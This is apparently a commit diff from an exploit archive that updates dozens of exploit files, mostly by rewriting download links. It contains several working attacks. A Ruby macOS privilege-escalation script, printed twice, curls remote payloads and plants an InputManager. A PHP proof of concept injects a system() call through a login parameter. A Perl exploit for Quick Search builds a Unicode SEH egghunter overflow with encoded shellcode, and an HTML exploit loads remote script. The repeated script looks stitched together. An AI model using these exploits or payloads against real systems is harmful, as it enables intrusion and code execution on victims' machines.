INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
"tar -zxvf /tmp/moab_im.tar.gz"
case bugselected
when 0
target_url = "http://projects.info-pull.com/moab/bug-files/notification"
trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
when 1
target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
when 2
target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
end
CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"
def escalate()
puts "++ Welcome to Pwndertino..."
system CMD_LINE
sleep 5
system "/Users/Shared/shX"
end
escalate()
# milw0rm.com [2007-01-23]
#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
# Lance M. Havok <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-22-01-2007: All your crash are belong to us.
#
require 'fileutils'
bugselected = (ARGV[0] || 0).to_i
# INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz"
# keeping a local backup. /str0ke
INPUTMANAGER_URL = "https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/MOAB-22-01-2007_im.tar.gz"
INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" +
"mkdir -p ~/Library/InputManagers/;" +
"cd ~/Library/InputManagers/;" +
"tar -zxvf /tmp/moab_im.tar.gz"
case bugselected
when 0
target_url = "http://projects.info-pull.com/moab/bug-files/notification"
trigger_cmd = "curl -o /tmp/notify #{target_url} ; /tmp/notify &"
when 1
target_url = "http://projects.info-pull.com/moab/bug-files/pwned-ex-814.ttf"
trigger_cmd = "/usr/bin/curl -o /tmp/pwned-ex-814.ttf #{target_url}; open /tmp/pwned-ex-814.ttf"
when 2
target_url = "http://projects.info-pull.com/moab/bug-files/MOAB-10-01-2007.dmg.gz"
trigger_cmd = "/usr/bin/curl -o /tmp/moab_dmg.gz #{target_url}; cd /tmp; gunzip moab_dmg.gz; open MOAB-10-01-2007.dmg"
end
CMD_LINE = "#{INPUTMANAGER_PLANT} ; #{trigger_cmd}"
def escalate()
puts "++ Welcome to Pwndertino..."
system CMD_LINE
sleep 5
system "/Users/Shared/shX"
end
escalate()
# milw0rm.com [2007-01-23]

2
platforms/php/webapps/17307.txt
View file

@ -16,4 +16,4 @@ step2.
Change request message to attacking file's post ID and file ID/name.
ex) http-request-message body : ~&postid=1&~~&threadid=1&divname=1-1-1-attach&fileid=2&filename=account.txt~
Full Advisory: http://www.exploit-db.com/download_pdf/17307
Full Advisory: http://www.exploit-db.com/docs/17307.pdf

34
platforms/php/webapps/36821.txt Executable file
View file

@ -0,0 +1,34 @@
#[+] Author: TUNISIAN CYBER
#[+] Title: WebUI Remote Code Execution Vulnerability
#[+] Date: 21-04-2015
#[+] Vendor: https://github.com/baram01/webui/
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Proof of concept: http://i.imgur.com/co9Qx0n.png
-------------------------------------------------------------------------------
p0c:
http://site/webui/mainfile.php?username=USER&password=PASSWORD&_login=1&Logon=';echo system('command');'
Live HTTP Header:
http://192.168.186.129/webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27
GET /webui/mainfile.php?username=RCE&password=RCE&_login=1&Logon=%27;echo%20system(%27id%27);%27 HTTP/1.1
Host: 192.168.186.129
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 22 Apr 2015 13:20:23 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.39-0+deb7u2
Content-Encoding: gzip
Vary: Accept-Encoding
Content-Length: 51
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

8
platforms/php/webapps/697.c
View file

@ -1,4 +1,4 @@
// Compiled version: http://www.milw0rm.com/sploits/phpbbmemorydump.rar
// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/phpbbmemorydump.rar
// Source serv.cpp is at the bottom of the page - str0ke
// Notes from author:
@ -724,6 +724,6 @@ serveur::~serveur()
*/
// milw0rm.com [2004-12-17]
// milw0rm.com [2004-12-17]

8
platforms/php/webapps/897.cpp
View file

@ -1,5 +1,5 @@
/* Paisterist's code was nice but heres mil's version.
* precompiled: http://www.milw0rm.com/sploits/897.rar
* precompiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/897.rar
* Usage:
* bcc32 897.cpp
* and place the exe in your firefox profile dir.
@ -72,6 +72,6 @@ int main()
free (buffer);
return 0;
}
// milw0rm.com [2005-03-24]
}
// milw0rm.com [2005-03-24]

1
platforms/windows/dos/15297.txt
View file

@ -72,7 +72,6 @@ Double Frees are usually exploitable but in this case it doesnt look simple. The
Proof of Concept:
http://www.exploit-db.com/application/15297
Vendor-Patch Status:

4
platforms/windows/dos/18755.c
View file

@ -16,7 +16,7 @@ http://www.whitecell.org/list.php?id=50
The shell code to acheive privilage esclation as per the article used the following steps
http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf
http://www.exploit-db.com/docs/18712.pdf
.
1) Use PslookupProcessId get system token
@ -57,7 +57,7 @@ unsigned char hexcode[]="\x90\x90\x90\xcc\x90\x90\x90\x90";
/*
The shell code to acheive privilage esclation
Add you shellcode here as per the article http://www.exploit-db.com/wp-content/themes/exploit/docs/18712.pdf
Add you shellcode here as per the article http://www.exploit-db.com/docs/18712.pdf
the malware used the following method.
1) Wse PslookupProcessId get system token

2
platforms/windows/dos/19575.txt
View file

@ -1,4 +1,4 @@
Paper: http://www.exploit-db.com/wp-content/themes/exploit/docs/19527.pdf
Paper: http://www.exploit-db.com/docs/19527.pdf
Security Research - .Net Framework Tilde Character DoS

2
platforms/windows/dos/36443.txt
View file

@ -8,4 +8,4 @@ Note: The impact of the unspecified vulnerability is not known. We will update t
Versions prior to Opera Web Browser 11.60 are vulnerable.
http://www.exploit-db.com/sploits/36443.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36443.zip

2
platforms/windows/dos/36788.txt
View file

@ -64,4 +64,4 @@ Successful exploitation may allow execution of arbitrary code.
===========
http://protekresearchlab.com/exploits/PRL-2015-04.docx
http://www.exploit-db.com/sploits/36788.docx
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36788.docx

1
platforms/windows/local/11093.rb
View file

@ -1,5 +1,4 @@
# Exploit Title: [Soritong v1.0 Universal BOF-SEH (META)]
# Software Link: #[http://www.exploit-db.com/downloads/a1def037869c831496bda3d81b0d06f5-soritong10.exe]
# Version: [V1.0]
# Tested on: [windows xp 2]

2
platforms/windows/local/12255.rb
View file

@ -79,5 +79,3 @@ class Metasploit3 < Msf::Exploit::Remote
end
end
<http://www.exploit-db.com/application/11010>

1
platforms/windows/local/14550.py
View file

@ -1,7 +1,6 @@
# Exploit Title: Easy RM to MP3 2.7.3.700 Local Buffer Overflow (.m3u , .pls , .smi , .wpl , .wax , .wvx , .ram)
# Date: 4 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.exploit-db.com/application/10642/
# Version: 2.7.3.700
# Tested on: Windows XP SP 1
# CVE : N / A

1
platforms/windows/local/14630.py
View file

@ -6,7 +6,6 @@
# Coded By: Dr_IDE
# Found By: abhishek lyall
# Usage: Load the evil .m3u file and click on it.
# Download: http://www.exploit-db.com/application/14612
# Tested On: Windows XPSP3
#
#################################################################

1
platforms/windows/local/14633.py
View file

@ -7,7 +7,6 @@
# you on this one ! :)
# Grtz to dookie2000ca :)
# Original Advisory: http://www.exploit-db.com/exploits/14517 (hadji samir)
# Download: http://www.exploit-db.com/application/14517
# Platform: Windows XP SP3 En Professional - VirtualBox
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/

1
platforms/windows/local/14651.py
View file

@ -5,7 +5,6 @@
# Date: August 15, 2010
# Author: dijital1
# Original Advisory: http://www.exploit-db.com/exploits/14601 - abhishek lyall
# Download: http://www.exploit-db.com/application/14601/
# Platform: Windows XP SP3 EN Professional - VMware
# Greetz to: Corelan Security Team, Exploit-db, OffSec
# http://www.corelan.be:8800/index.php/security/corelan-team-members/

1
platforms/windows/local/15184.c
View file

@ -1,7 +1,6 @@
# Exploit Title: AudioTran SafeSEH+SEHOP all-at-once attack method exploit
# Date: 2010.10.1
# Author: x90c
# Software Link: http://www.exploit-db.com/application/14961/
# Version: 1.4.2.4
# Tested on:
# - MS Win xp sp3 pro ko ( SafeSEH )

1
platforms/windows/local/17449.py
View file

@ -3,7 +3,6 @@
#[+]Exploit Title: FreeAmp 2.0.7 .PLS File Buffer Overflow Exploit
#[+]Date: 24\06\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.exploit-db.com/application/17441/
#[+]Version: 2.0.7
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A

2
platforms/windows/local/17473.txt
View file

@ -11,7 +11,7 @@
#It work reliably on IE9/FF4 and other browsers.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
http://www.exploit-db.com/download_pdf/17469
http://www.exploit-db.com/docs/17469.pdf
# me : twitter.com/ponez
# also check here for The Persian docs of this methods and more :
http://www.0days.ir/article/

2
platforms/windows/local/17474.txt
View file

@ -13,7 +13,7 @@ Exploit
# so just need to open open Office , and then open exploit after a few second and saw a nice calc.
#
# The Arashi : http://abysssec.com/files/The_Arashi.pdf
# http://www.exploit-db.com/download_pdf/17469
# http://www.exploit-db.com/docs/17469.pdf
#
# me : twitter.com/ponez
# aslo check here for Persian docs of this methods and more :

1
platforms/windows/local/17634.pl
View file

@ -3,7 +3,6 @@
#[+]Exploit Title: Free CD to MP3 Converter 3.1 Universal DEP Bypass Exploit
#[+]Date: 07\08\2011
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.exploit-db.com/application/15480/
#[+]Version: 3.1
#[+]Tested On: WIN-XP SP3 Brazilian Portuguese
#[+]CVE: N/A

2
platforms/windows/local/36424.txt
View file

@ -41,4 +41,4 @@ Observed Result:
Authentication was successful as local system and a file written to the root of the C drive .
Proof of Concept:
http://www.exploit-db.com/sploits/36424.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36424.zip

135
platforms/windows/local/36822.pl Executable file
View file

@ -0,0 +1,135 @@
#!/usr/bin/perl
###########################################################################=
#######################
# Exploit Title: Quick Search 1.1.0.189 'search textbox' Unicode SEH egghunter Buffer Overflow
# Date: 2015-04-23
# Exploit Author: Tomislav Paskalev
# Vulnerable Software: Quick Search v1.1.0.189
# Vendor Homepage: http://www.glarysoft.com/
# Software Link: https://www.exploit-db.com/apps/93feb6805c08d3ca84b0636a3a986a56-qsearchsetup.exe
# Version: 1.1.0.189
# Tested on: Windows XP SP2 EN
# OSVDB-ID: 93445
###########################################################################=
#######################
# Credits:
# - Vulnerability identified by ariarat
# http://www.exploit-db.com/exploits/25443/
###########################################################################=
#######################
# Exploit development notes:
# - instead of attaching the process, start the executable within the debugger
# - the application's module gtms_D7.bpl was not compiled with SafeSEH
# - since this is a unicode buffer overflow \x00 will not terminate the string
# - 6 available unicode friendly P/P/R pointers within the module
# - this exploit should work across different OS versions
# (tested only on Win XP SP2 EN)
# - several other unicode friendly aplication modules are available, but have not been checked
###########################################################################=
#######################
# How to exploit:
# - Quick Search -> (click arrow for menu) Match Path -> (click arrow for menu) Full Mode ->=20
# (paste created exploit string into the search textbox)
# - once the exploit string is pasted, the egghunter starts to search the memory for the marker
# - on my test machine the search takes around 30 seconds (until the shellcode gets executed)
# - during the search the mouse cursor will NOT have a hourglass displayed beside it
# - during the search the application will NOT become unresponsive (i.e. it will be usable)
###########################################################################=
#######################
# Thanks to:
# - ariarat (PoC)
# - Peter Van Eeckhoutte (exploit development tutorials)
# - Offensive Security (IT security courses, admin support)
###########################################################################=
#######################
my $junk = "A" x 21;
# Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=3DEAX
# converted to ASCII
my $egghunter =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
"B9KHHHYCDO4KD1KB3QIQ9OY190IQ9PIQ9PI0IOS13PCPC1313PCOGB11J2J11R8R" .
"0P01100OQRK11OQB102Q1OR02PB0BNP0BORQ11228PPP8Q1PBT50JQ9RUOF0M212" .
"J1Z3IRO3F2O41QB1VP2S20J26RBP3BHRZ2MBVPNRGPLCCOESBCJ2C14482O2O18B" .
"52000P02EB032PTBNBKR92J0L2OBR1E3ICJPLRO0B0URZ0G2KPO1I2W11Q1AA";
my $fill = "C" x (1045 - length($junk.$egghunter));
my $nextSEH = "\x41\x6d"; # INC ECX; INSW Yz DX
my $SEH = "\x70\x34"; # POP POP RET from gtms_D7.bpl
# jump to egghunter code
my $allign = "\x58"; # POP EAX
$allign = $allign."\x6d"; # NOP/remove NULL bytes
$allign = $allign."\x58"; # POP EAX
$allign = $allign."\x6d"; # NOP/remove NULL bytes
$allign = $allign."\x58"; # POP EAX
$allign = $allign."\x6d"; # NOP/remove NULL bytes
$allign = $allign."\x05\x01\x11"; # ADD EAX, 0x11000100
$allign = $allign."\x6d"; # NOP/remove NULL bytes
$allign = $allign."\x2d\x09\x11"; # SUB EAX, 0x11000900
$allign = $allign."\x6d"; # NOP/remove NULL bytes
my $jumptoegghunter = "\x50"; # PUSH EAX
$jumptoegghunter = $jumptoegghunter."\x6d"; # NOP/remove NULL bytes
$jumptoegghunter = $jumptoegghunter."\xc3"; # RETN
# fill the rest of the stack frame + padding (to avoid a memory area which coverts to upper alpha)
my $fill2 = "D" x 500;
# allign EAX and jump to shellcode
# (this gets executed after the marker is found)
my $allign2 = "\x6d"; # NOP/remove NULL bytes
$allign2 = $allign2."\x57"; # PUSH EDI
$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
$allign2 = $allign2."\x58"; # POP EAX
$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
$allign2 = $allign2."\xb9\x1b\xaa"; # MOV ECX, 0xaa001b00
$allign2 = $allign2."\xe8"; # ADD AL,CH (equivalent to adding "1b" (from the previous command)
# to the last two bytes of EAX; i.e. increase EAX with "1b")
$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
$allign2 = $allign2."\x50"; # PUSH EAX
$allign2 = $allign2."\x6d"; # NOP/remove NULL bytes
$allign2 = $allign2."\xc3"; # RETN
# msfpayload windows/messagebox
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=3DEAX
# converted to ASCII
my $shellcode =
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
"11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
"BYKWTHY44MTZTQNPV29190IQ919PI19PIOY19Q3Q3PC13Q3PC13070QPZ2JQ1B8R" .
"000Q10011RKOQQ10QOBOQ0BOBORQ200Q2Q2Q1Q2QHB0OHQ1Q2CEPJQ91JRY2XBKB" .
"MPKPI19S3Q4NVQ40J0TBT2QOZRR0N0RPPD70TT1RJC9OEP4PN2KNQQQPD400N2KN" .
"PSFQ4PLPNBKNT0615PL2NRKRPOV0418PNRKBSPNOW20PL0KBGQ6B51XPRRO2D0X0" .
"Q35PLP3NS1YB3P11H0Q49BOR92QRQ40RL0KBPRLBD340UD4RNBK010UQW0L2N2KN" .
"S343F18QBQHBFS1492Z0LPK0PPJB7QXBL0KBR3J2QNP33P1T8RKCJQ3OGPDQ3D9R" .
"NBKPTSDBL0KBFQQOX2N4621PK0OR0NQD9R02KPL0N0LRKNTPKRP0RB4162G2I21N" .
"XPO162M03NQ38OWNX2KQ9QTB7PKRSPL1QOD1F0HBQ2E2M01PNRK02CJ0UCDPF1QP" .
"JPKP5OFBLPK16RLR0PK0N2KQCQZC50L1EPQCHBK0NRK45PTBN2K1CP1QX1XPOD9Q" .
"ST4PE3DCE0LD3R1NX13NXP2C3NX1G1IBNODRK0948C5POSI2JQRQ5NX0L0NNR2N3" .
"F2NBJ0LR3BBPK0XBMPO492OCIBO29RO0OSIT7P52D0D0MRKC1RNPJD8PY422C0CB" .
"OBWSEPLP4341C2BB8QX0N2N0IBOQ92OD9BO2N1YPC45Q7RXNR0HB02L2PBLB1003" .
"7NQ0148RVPS2F1B342NOC0TPUNXODOE221CNRQ51312PKNXP10LQFOTQ62J0MB92" .
"MP61606NYBOBSBEBCODPLOYBO02CFNPPMBKPNOX2OQBC2BMPOPL2M0W1W2LNW24S" .
"112BK1H41T11YBO29BO2KPO130X2PQHNQ00P1P0QGB0NS0XNRCDQEP531BC43OTR" .
"0P12KRK0NRH410LD4BD45PT0LOY0JPCBBOXC2PNOF0N03BHPW0PR1D82PC1BDP43" .
"5P9OB0OB508ODP00B0LS2PI030SD508NQSD370PC3PQP040D5P8020OOEOI0B1DN" .
"PS5NUOHP31ER4OHPB0PT20L031HNS0D13B8BSB5NQ00P1BXQ70P3B0OPPQVBUT0S" .
"B18OBB4320E012HT4ODPCR8QU40R30SRBPO32PNORQ8P5D0QQQTOENXR2PEPP38B" .
"R0NPG20D0BIT0BNB5P80B251QS4T02IR0ROP038T30UP2B83CR5R3232B0HP20OR" .
"3B4P0C5R1NPB1SH0EP5T5P41WR0Q5P3BBQ8P3BW03B1OCQINPRNP4T1SJ2IPO3HT" .
"22LC724B3CBBN390MNQQ60QT912120J01R013C32CS1QS2B0KPOB8R03DBQ2K2PR" .
"PPP0KPOBB3E0FQXOQOQAA";
my $payload = $junk.$egghunter.$fill.$nextSEH.$SEH.$allign.$jumptoegghunter.$fill2."0t0t".$allign2.$shellcode;
open(myfile,'>QuickSearch_egghunter_messagebox.txt');
print myfile $payload;
close(myfile);
print "Wrote ".length($payload)." bytes\n";

2
platforms/windows/local/5442.cpp
View file

@ -10,6 +10,6 @@
/// calc will not be run.
/////////////////////////////////////////////////////////////
http://www.milw0rm.com/sploits/2008-exploit_08021.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-exploit_08021.zip
// milw0rm.com [2008-04-14]

1
platforms/windows/remote/12495.pl
View file

@ -1,7 +1,6 @@
# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :

1
platforms/windows/remote/15016.rb
View file

@ -1,7 +1,6 @@
# Exploit Title: Integard Pro 2.2.0.9026 (Win7 ROP-Code Metasploit Module)
# Date: 2010-09-15
# Author: Node
# Software Link: http://www.exploit-db.com/application/14941
# Version: Race River Integard Pro 2.2.0.9026, integard32.dll(v.2.0.0.306)
# Tested on: Windows 7 x64 Eng
# CVE : -

6
platforms/windows/remote/157.c
View file

@ -265,6 +265,6 @@ return;
}
}
// milw0rm.com [2004-02-27]
// milw0rm.com [2004-02-27]

2
platforms/windows/remote/36491.txt
View file

@ -1,6 +1,6 @@
Source: https://github.com/SecurityObscurity/cve-2015-0313
PoC: http://www.exploit-db.com/sploits/36491.zip
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36491.zip
Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit

2
platforms/windows/remote/36542.txt
View file

@ -6,4 +6,4 @@ Successful attacks will allow attackers to execute arbitrary code within the con
ExpressView Browser Plug-in 6.5.0.3330 and prior versions are vulnerable.
http://www.exploit-db.com/sploits/36542.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36542.zip

2
platforms/windows/remote/36546.txt
View file

@ -6,4 +6,4 @@ Successfully exploiting this issue may allow attackers to execute arbitrary code
GreenBrowser 6.0.1002 and prior versions are vulnerable.
http://www.exploit-db.com/sploits/36546.rar
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/36546.rar

2
platforms/windows/remote/418.c
View file

@ -2,7 +2,7 @@ This 0day exploit is known to be circulating in the wild
There is no patch for this vulnerability -> Do not use Winamp !
http://www.milw0rm.com/sploits/skinhead.rar (171 Ko)
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/skinhead.rar (171 Ko)
index.html

10
platforms/windows/remote/986.html
View file

@ -1,5 +1,5 @@
<!--
1) wget http://www.milw0rm.com/sploits/05072005.js
1) wget https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/05072005.js
2) change src= below
3) edit index and change tftp location
@ -11,7 +11,7 @@
<meta http-equiv="Expires" content="Tue, 16 Jan 1990 21:29:02 GMT">
<script language="javascript" src="http://www.milw0rm.com/sploits/05072005.js"></script></head>
<script language="javascript" src="https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/sploits/05072005.js"></script></head>
<body>
@ -59,6 +59,6 @@ function loader() {
</script>
<script language="javascript">postamble();</script>
</body></html>
# milw0rm.com [2005-05-07]
</body></html>
# milw0rm.com [2005-05-07]

2
platforms/windows/webapps/19525.txt
View file

@ -1,5 +1,5 @@
PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19525.zip
Paper: http://www.exploit-db.com/download_pdf/19527
Paper: http://www.exploit-db.com/docs/19527.pdf
Security Research - IIS Short File/Folder Name Disclosure